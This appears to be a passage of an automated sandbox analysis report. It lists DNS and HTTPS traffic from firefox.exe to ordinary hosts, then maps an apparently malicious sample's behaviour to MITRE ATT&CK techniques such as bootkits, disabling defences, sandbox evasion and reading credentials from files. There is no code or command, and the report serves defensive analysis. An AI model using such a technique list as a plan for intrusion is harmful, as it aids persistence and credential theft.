prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
119 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
131 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.180.4
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.180.4
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
88 B
1
1

DNS Request

www.google.com

DNS Response

2a00:1450:4009:81e::2004
142.250.180.4:443

www.google.com

https

firefox.exe

3.4kB
9.3kB
10
10
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.187.206
8.8.8.8:53

consent.youtube.com

dns

firefox.exe

65 B
81 B
1
1

DNS Request

consent.youtube.com

DNS Response

142.250.187.206
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

172.217.169.46
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
77 B
1
1

DNS Request

play.google.com

DNS Response

172.217.169.46
8.8.8.8:53

play.google.com

dns

firefox.exe

61 B
89 B
1
1

DNS Request

play.google.com

DNS Response

2a00:1450:4009:818::200e
172.217.169.46:443

play.google.com

https

firefox.exe

3.1kB
9.3kB
6
10

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion